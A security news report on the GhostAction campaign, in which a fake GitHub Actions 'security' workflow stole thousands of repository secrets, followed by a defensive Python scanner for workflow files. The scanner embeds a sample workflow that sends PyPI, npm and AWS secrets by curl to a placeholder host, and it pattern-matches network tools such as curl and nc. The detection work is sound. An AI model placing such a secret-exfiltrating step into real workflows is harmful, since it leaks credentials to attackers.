GitHub Supply Chain Attack: GhostAction Steals Thousands of Tokens and Secrets

A major supply chain attack on GitHub, known as the “GhostAction” campaign, has resulted in the theft of 3,325 secrets from 327 compromised GitHub accounts. Security researchers from GitGuardian discovered the attack after a project called FastUUID was found to be compromised. The attacker used the maintainer’s compromised account to publish a malicious GitHub Actions workflow designed to steal sensitive information such as PyPI and npm keys, AWS credentials, DockerHub tokens, and Cloudflare keys, among others.

The malicious workflow, disguised as an “Add Github Actions Security workflow,” aimed to silently siphon off secrets from affected repositories. After GitGuardian raised the alarm, affected projects were notified, commits were rolled back where possible, and the exfiltration server was taken offline—successfully disrupting the attacker’s campaign.
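As an added defender-side illustration (not part of the original report and not GitGuardian’s tooling), the script below triages GitHub Actions workflow files for the pattern described above: repository secrets referenced in a workflow that also invokes a shell network tool against a non-GitHub destination. Both workflow samples and the destination host name are constructed placeholders.

```python
import re
from dataclasses import dataclass

# Constructed sample (placeholder host): the shape of workflow GhostAction pushed,
# a "security" workflow that reads repository secrets and POSTs them off-platform.
MALICIOUS = """\
name: Add Github Actions Security workflow
on: [push]
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - name: Collect
        env:
          PYPI: ${{ secrets.PYPI_API_TOKEN }}
          NPM: ${{ secrets.NPM_TOKEN }}
          AWS: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        run: |
          curl -s -X POST -d "pypi=$PYPI&npm=$NPM&aws=$AWS" \\
            https://exfil.example.invalid/collect
"""

# Constructed benign sample: the same secret, consumed only by a pinned publish action.
BENIGN = """\
name: Publish
on: [release]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_API_TOKEN }}
"""

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
ALL_SECRETS = re.compile(r"toJSON\s*\(\s*secrets\s*\)")  # dumps every secret at once
NET_CMD = re.compile(r"\b(curl|wget|nc|ncat)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
TRUSTED_HOSTS = {"github.com", "api.github.com"}  # extend with your org's own endpoints

@dataclass
class Finding:
    secrets: list
    untrusted_hosts: list
    dumps_all_secrets: bool
    uses_net_cmd: bool

    def is_suspicious(self) -> bool:
        # Secrets in reach AND a shell network tool AND a non-GitHub destination.
        touches_secrets = self.dumps_all_secrets or bool(self.secrets)
        return touches_secrets and self.uses_net_cmd and bool(self.untrusted_hosts)

def scan_workflow(text: str) -> Finding:
    """Heuristic triage of one workflow file; flagged files still need a human review."""
    secrets = sorted(set(SECRET_REF.findall(text)))
    hosts = sorted({h for h in URL_HOST.findall(text) if h not in TRUSTED_HOSTS})
    return Finding(secrets, hosts, bool(ALL_SECRETS.search(text)), bool(NET_CMD.search(text)))
```

Run it over every file under `.github/workflows/` in each repository, and treat a new workflow commit that flips the result to suspicious as a signal worth the same scrutiny as a new collaborator.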

The investigation revealed that, of the 817 affected repositories, 100 had already removed the malicious changes by the time they were notified; the researchers were able to alert most of the remainder, except for a handful whose notification issues or repositories had been deleted.

At the same time, another supply chain attack—called S1ngularity—struck over 2,000 GitHub accounts and leaked thousands of secrets, but this was found to be unrelated to GhostAction after further review.

These incidents highlight the ongoing risks in open-source supply chains, reinforcing the need for developers to protect secrets and closely monitor third-party integrations.